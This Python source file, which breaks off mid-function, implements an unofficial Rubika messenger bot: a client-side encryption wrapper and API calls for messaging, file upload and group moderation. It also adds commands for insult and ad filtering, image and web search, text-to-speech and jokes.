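# The encryption helper derives a 32-byte AES key from the 32-character Rubika auth string:
# secret() reorders the four 8-character quarters and rotates digits by 5 and lowercase letters
# by 9; the result is used as an AES-CBC key with an all-zero IV. Payloads are padded, encrypted
# and base64-encoded on the way out, and base64-decoded, decrypted and unpadded on the way in.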
class encryption:
def __init__(self, auth):
self.key = bytearray(self.secret(auth), "UTF-8")
self.iv = bytearray.fromhex('00000000000000000000000000000000')
def replaceCharAt(self, e, t, i):
return e[0:t] + i + e[t + len(i):]
def secret(self, e):
t = e[0:8]
i = e[8:16]
n = e[16:24] + t + e[24:32] + i
s = 0
while s < len(n):
e = n[s]
if e >= '0' and e <= '9':
t = chr((ord(e[0]) - ord('0') + 5) % 10 + ord('0'))
n = self.replaceCharAt(n, s, t)
else:
t = chr((ord(e[0]) - ord('a') + 9) % 26 + ord('a'))
n = self.replaceCharAt(n, s, t)
s += 1
return n
def encrypt(self, text):
raw = pad(text.encode('UTF-8'), AES.block_size)
aes = AES.new(self.key, AES.MODE_CBC, self.iv)
enc = aes.encrypt(raw)
result = base64.b64encode(enc).decode('UTF-8')
return result
def decrypt(self, text):
aes = AES.new(self.key, AES.MODE_CBC, self.iv)
dec = aes.decrypt(base64.urlsafe_b64decode(text.encode('UTF-8')))
result = unpad(dec, AES.block_size).decode('UTF-8')
return result
class Bot:
def __init__(self, auth):
self.auth = auth
self.enc = encryption(auth)
    def sendMessage(self, chat_id, text, message_id=None):
        # message_id is optional; when given, the message is sent as a reply.
        # Retries until the request and the decryption of the response both succeed.
        t = False
        while t == False:
            try:
                p = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
                    "method":"sendMessage",
                    "input":{
                        "object_guid":chat_id,
                        "rnd":f"{randint(100000,900000)}",
                        "text":text,
                        "reply_to_message_id":message_id
                    },
                    "client":{
                        "app_name":"Main",
                        "app_version":"3.2.1",
                        "platform":"Web",
                        "package":"web.rubika.ir",
                        "lang_code":"fa"
                    }
                }))},url="https://messengerg2c17.iranlms.ir/")
                p = loads(self.enc.decrypt(p.json()["data_enc"]))
                t = True
            except:
                t = False
        return p
def deleteMessages(self, chat_id, message_ids):
return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"deleteMessages",
"input":{
"object_guid":chat_id,
"message_ids":message_ids,
"type":"Global"
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c66.iranlms.ir/")
def requestFile(self, name, size , mime):
o = ''
while str(o) != '<Response [200]>':
o = post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"requestSendFile",
"input":{
"file_name":name,
"size":size,
"mime":mime
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c66.iranlms.ir/")
try:
k = loads(self.enc.decrypt(o.json()["data_enc"]))
if k['status'] != 'OK' or k['status_det'] != 'OK':
o = '502'
except:
o = '502'
return k['data']
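    # fileUpload streams the bytes to the upload_url returned by requestFile in 131072-byte (128 KiB)
    # parts. Each part carries auth, file-id, access-hash-send, total-part and part-number headers, and
    # the access_hash_rec from the final part's response is what sendFile/sendImage/sendVoice expect.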
def fileUpload(self, bytef ,hash_send ,file_id ,url):
if len(bytef) <= 131072:
h = {
'auth':self.auth,
'chunk-size':str(len(bytef)),
'file-id':str(file_id),
'access-hash-send':hash_send,
'total-part':str(1),
'part-number':str(1)
}
t = False
while t == False:
try:
j = post(data=bytef,url=url,headers=h).text
j = loads(j)['data']['access_hash_rec']
t = True
except:
t = False
return j
else:
            # number of 128 KiB parts (ceil division); floor(n / 131072) + 1 over-counted on exact multiples
            t = math.ceil(len(bytef) / 131072)
for i in range(1,t+1):
if i != t:
k = i - 1
k = k * 131072
t2 = False
while t2 == False:
try:
o = post(data=bytef[k:k + 131072],url=url,headers={
'auth':self.auth,
'chunk-size':str(131072),
'file-id':file_id,
'access-hash-send':hash_send,
'total-part':str(t),
'part-number':str(i)
}).text
o = loads(o)['data']
t2 = True
except:
t2 = False
j = k + 131072
j = round(j / 1024)
j2 = round(len(bytef) / 1024)
print(str(j) + 'kb / ' + str(j2) + ' kb')
else:
k = i - 1
k = k * 131072
t2 = False
while t2 == False:
try:
p = post(data=bytef[k:],url=url,headers={
'auth':self.auth,
'chunk-size':str(len(bytef[k:])),
'file-id':file_id,
'access-hash-send':hash_send,
'total-part':str(t),
'part-number':str(i)
}).text
p = loads(p)['data']['access_hash_rec']
t2 = True
except:
t2 = False
j2 = round(len(bytef) / 1024)
print(str(j2) + 'kb / ' + str(j2) + ' kb')
return p
def sendFile(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, text=None, message_id=None):
if text == None:
if message_id == None:
t = False
while t == False:
try:
p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
t = True
except:
t = False
return p
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
if message_id == None:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"File",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
def sendImage(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, thumb_inline , width , height, text=None, message_id=None):
if text == None:
if message_id == None:
t = False
while t == False:
try:
p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
t = True
except:
t = False
return p
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
if message_id == None:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Image",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'thumb_inline':thumb_inline,
'width':width,
'height':height
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
def sendVoice(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, duration, text=None, message_id=None):
if text == None:
if message_id == None:
t = False
while t == False:
try:
p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
t = True
except:
t = False
return p
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
if message_id == None:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
else:
return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,900000)}",
"text":text,
"reply_to_message_id":message_id,
"file_inline":{
"dc_id":str(dc_id),
"file_id":str(file_id),
"type":"Voice",
"file_name":file_name,
"size":size,
"mime":mime,
"access_hash_rec":access_hash_rec,
'time':duration,
}
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc']))
def getUserInfo(self, chat_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getUserInfo",
"input":{
"user_guid":chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c37.iranlms.ir/").json()["data_enc"]))
def getMessages(self, chat_id,min_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesInterval",
"input":{
"object_guid":chat_id,
"middle_message_id":min_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("messages")
def getInfoByUsername(self, username):
''' username should be without @ '''
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getObjectByUsername",
"input":{
"username":username
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c23.iranlms.ir/").json().get("data_enc")))
def banGroupMember(self, chat_id, user_id):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"banGroupMember",
"input":{
"group_guid": chat_id,
"member_guid": user_id,
"action":"Set"
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c21.iranlms.ir/")
def invite(self, chat_id, user_ids):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"addGroupMembers",
"input":{
"group_guid": chat_id,
"member_guids": user_ids
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c22.iranlms.ir/")
def getGroupAdmins(self, chat_id):
t = False
while t == False:
try:
p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"client":{
"app_name":"Main",
"app_version":"2.9.5",
"lang_code":"fa",
"package":"ir.resaneh1.iptv",
"platform":"Android"
},
"input":{
"group_guid":chat_id
},
"method":"getGroupAdminMembers"
}))},url="https://messengerg2c22.iranlms.ir/")
p = loads(self.enc.decrypt(p.json().get("data_enc")))
t = True
except:
t = False
return p
def getMessagesInfo(self, chat_id, message_ids):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesByID",
"input":{
"object_guid": chat_id,
"message_ids": message_ids
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"])).get("data").get("messages")
def setMembersAccess(self, chat_id, access_list):
return post(json={
"api_version": "4",
"auth": self.auth,
"client": {
"app_name": "Main",
"app_version": "2.9.5",
"lang_code": "fa",
"package": "ir.resaneh1.iptv",
"platform": "Android"
},
"data_enc": self.enc.encrypt(dumps({
"access_list": access_list,
"group_guid": chat_id
})),
"method": "setGroupDefaultAccess"
}, url="https://messengerg2c24.iranlms.ir/")
def getGroupInfo(self, chat_id):
return loads(self.enc.decrypt(post(
json={
"api_version":"5",
"auth": self.auth,
"data_enc": self.enc.encrypt(dumps({
"method":"getGroupInfo",
"input":{
"group_guid": chat_id,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"]))
def get_updates_all_chats(self):
t = False
while t == False:
try:
                time_stamp = str(math.floor(datetime.datetime.today().timestamp()) - 200)
p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getChatsUpdates",
"input":{
"state":time_stamp,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/")
p = loads(self.enc.decrypt(p.json().get("data_enc"))).get("data").get("chats")
t = True
except:
t = False
return p
def get_updates_chat(self, chat_id):
        time_stamp = str(math.floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesUpdates",
"input":{
"object_guid":chat_id,
"state":time_stamp
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("updated_messages")
def my_sticker_set(self):
        time_stamp = str(math.floor(datetime.datetime.today().timestamp()) - 200)
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMyStickerSets",
"input":{},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data")
def getThumbInline(self,image_bytes:bytes):
im = Image.open(io.BytesIO(image_bytes))
width, height = im.size
if height > width:
new_height = 40
new_width = round(new_height * width / height)
else:
new_width = 40
new_height = round(new_width * height / width)
        im = im.resize((new_width, new_height), Image.LANCZOS)  # ANTIALIAS was removed in Pillow 10; LANCZOS is the same filter
changed_image = io.BytesIO()
im.save(changed_image, format='PNG')
changed_image = changed_image.getvalue()
return base64.b64encode(changed_image)
def getImageSize(self,image_bytes:bytes):
im = Image.open(io.BytesIO(image_bytes))
width, height = im.size
return width , height
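    # hex_to_rgb converts a hex colour string to an (r, g, b) tuple, e.g. '#3d3d3d' -> (61, 61, 61).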
def hex_to_rgb(self,value):
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
def write_text_image(self,text:str,bc_color:str='yellow',size:int=40,color='#3d3d3d',x=50,y=100):
try:
file_name = 'image/'+ bc_color +'.jpg'
image = Image.open(file_name)
size = int(size)
font = ImageFont.truetype('Vazir-Regular.ttf', size, encoding='unic')
draw = ImageDraw.Draw(image)
reshaped_text = arabic_reshaper.reshape(text) # correct its shape
changed_image = io.BytesIO()
if color.startswith('#') and len(color) < 8:
color = self.hex_to_rgb(color)
draw.text((x, y), reshaped_text,color, font = font)
image.save(changed_image, format='PNG')
changed_image = changed_image.getvalue()
return changed_image
elif color.startswith('(') and len(color) < 14 and color.count(',') == 2:
color = color.replace('(', '').replace(')', '')
list_c = color.split(',')
list_c2 = []
for i in list_c:
list_c2.append(int(i))
color = tuple(list_c2)
                draw.text((x, y), reshaped_text, color, font=font)  # was bidi_text (undefined); use the reshaped text as in the branch above
image.save(changed_image, format='PNG')
changed_image = changed_image.getvalue()
return changed_image
else:
return 'err'
except:
return 'err'
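# Minimal usage sketch for the Bot class (the guid below is illustrative, not a real chat):
#   bot = Bot("<32-character Rubika auth token>")
#   bot.sendMessage("g0hypotheticalchatguid", "hello")        # plain text message
#   info = bot.getInfoByUsername("some_username")             # username without the leading @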
def hasInsult(msg):
swData = [False,None]
for i in open("dontReadMe.txt").read().split("\n"):
if i in msg:
swData = [True, i]
break
else: continue
return swData
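# hasAds flags likely advertising: any "joing"/"joinc" fragment, or an @mention / rubika.ir link
# that resolves (via getInfoByUsername) to a Channel.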
def hasAds(msg):
    links = list(map(lambda ID: ID.strip()[1:], findall(r"@[\w\d_]+", msg))) + list(map(lambda link: link.split("/")[-1], findall(r"rubika\.ir/\w+", msg)))
joincORjoing = "joing" in msg or "joinc" in msg
if joincORjoing: return joincORjoing
else:
for link in links:
try:
Type = bot.getInfoByUsername(link)["data"]["chat"]["abs_object"]["type"]
if Type == "Channel":
return True
except KeyError: return False
def search_i(text,chat,bot):
try:
search = text[11:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id'])
jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text)
jd = jd['results']
a = 0
for j in jd:
if a <= 8:
try:
res = requests.get(j['image_link'])
if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '':
thumb = str(j['cdn_thumbnail'])
thumb = thumb.split('data:image/')[1]
thumb = thumb.split(';')[0]
if thumb == 'png':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'])
print('sended file')
elif thumb == 'webp':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'])
print('sended file')
else:
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'])
print('sended file')
a += 1
except:
print('image error')
else:
break
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], 'در حال یافتن کمی صبور باشید...', chat['last_message']['message_id'])
print('search image')
jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text)
jd = jd['results']
a = 0
for j in jd:
if a < 10:
try:
res = requests.get(j['image_link'])
if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '' and j['cdn_thumbnail'].startswith('data:image'):
thumb = str(j['cdn_thumbnail'])
thumb = thumb.split('data:image/')[1]
thumb = thumb.split(';')[0]
if thumb == 'png':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id'])
print('sended file')
elif thumb == 'webp':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id'])
print('sended file')
else:
b2 = res.content
tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
width, height = bot.getImageSize(b2)
bot.sendImage(chat['object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id'])
print('sended file')
a += 1
except:
print('image erorr')
return True
except:
print('image search err')
return False
def write_image(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
paramiters = text[8:-1]
paramiters = paramiters.split(':')
if len(paramiters) == 5:
b2 = bot.write_text_image(txt_xt,paramiters[0],int(paramiters[1]),str(paramiters[2]),int(paramiters[3]),int(paramiters[4]))
tx = bot.requestFile('code_image.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
width, height = bot.getImageSize(b2)
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id)
print('sended file')
return True
return False
except:
print('server ban bug')
return False
def uesr_remove(text,chat,bot):
try:
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if chat['last_message']['author_object_guid'] in admins:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if not msg_data['author_object_guid'] in admins:
bot.banGroupMember(chat['object_guid'], msg_data['author_object_guid'])
bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id'])
return True
return False
except:
print('server ban bug')
return False
def speak_after(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
speech = gTTS(txt_xt)
changed_voice = io.BytesIO()
speech.write_to_fp(changed_voice)
b2 = changed_voice.getvalue()
                tx = bot.requestFile('sound.ogg', len(b2), 'ogg')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
f = io.BytesIO()
f.write(b2)
f.seek(0)
audio = MP3(f)
dur = audio.info.length
bot.sendVoice(chat['object_guid'],tx['id'] , 'ogg', tx['dc_id'] , access, 'sound.ogg', len(b2), dur * 1000 ,message_id= c_id)
print('sended voice')
return True
return False
except:
print('server gtts bug')
return False
def joker(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
return True
except:
print('code bz server err')
return False
def info_qroz(text,chat,bot):
try:
user_info = bot.getInfoByUsername(text[7:])
if user_info['data']['exist'] == True:
if user_info['data']['type'] == 'User':
bot.sendMessage(chat['object_guid'], 'name:\n ' + user_info['data']['user']['first_name'] + ' ' + user_info['data']['user']['last_name'] + '\n\nbio:\n ' + user_info['data']['user']['bio'] + '\n\nguid:\n ' + user_info['data']['user']['user_guid'] , chat['last_message']['message_id'])
print('sended response')
else:
bot.sendMessage(chat['object_guid'], 'کانال است' , chat['last_message']['message_id'])
print('sended response')
else:
bot.sendMessage(chat['object_guid'], 'وجود ندارد' , chat['last_message']['message_id'])
print('sended response')
return True
except:
print('server bug6')
return False
def search(text,chat,bot):
try:
search = text[9:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + '\n\n'
bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + '\n\n'
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
return True
except:
print('search zarebin err')
bot.sendMessage(chat['object_guid'], 'در حال حاضر این دستور محدود یا در حال تعمیر است' , chat['last_message']['message_id'])
return False
def p_danesh(text,chat,bot):
try:
res = requests.get('http://api.codebazan.ir/danestani/pic/')
if res.status_code == 200 and res.content != b'':
b2 = res.content
width, height = bot.getImageSize(b2)
tx = bot.requestFile('jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, message_id=chat['last_message']['message_id'])
print('sended file')
return True
except:
